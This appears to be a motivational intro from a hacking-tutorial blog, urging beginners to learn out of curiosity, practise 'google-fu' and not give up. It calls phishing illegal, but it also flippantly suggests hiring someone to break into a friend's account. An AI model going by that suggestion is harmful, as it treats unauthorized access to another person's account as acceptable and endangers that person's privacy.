If you are learning hacking to hack your friends account, then you're never going to become a hacker. Just hire someone to do it. Because the time and effort you'll invest in making an attempt to learn how to do it yourself, and eventually  failing in the same, is much more valuable than the money required to hire someone (no I don't hack FB accounts for money). You might still try social engineering, but it is not a 100% working method, and well, phishing is not hacking, and is illegal. However, if you're motives aren't that selfish, and if you are on a quest for knowledge, then rest assured, you will achieve success. Also , you need to know the art of google-fu. If you face any difficulties, remember, google is a friend (and so am I, I have replied to 100s of comments on this blog personally and always get people through difficulties). The last thing, 50% of the people who come to this blog leave within 1 min of their visit, after seeing just one page. 30% stay for 4-10 mins and read 2 posts. 20% stay for more than 10 minutes, and keep coming back. Only these 20% successfully will become a hacker. Either they succeeded in achieving what they wanted, loved the blog, and came back for more, or they didn't succeed, but came back to try again, and I'm sure they would succeed on a second attempt. Remember, never give up. Less than 20% of the visitors here actually succeed in getting what they want, try and be in that 20%. And if you have any suggestion for this post or for my way of explanation or anything else in general, please comment.

Read full post »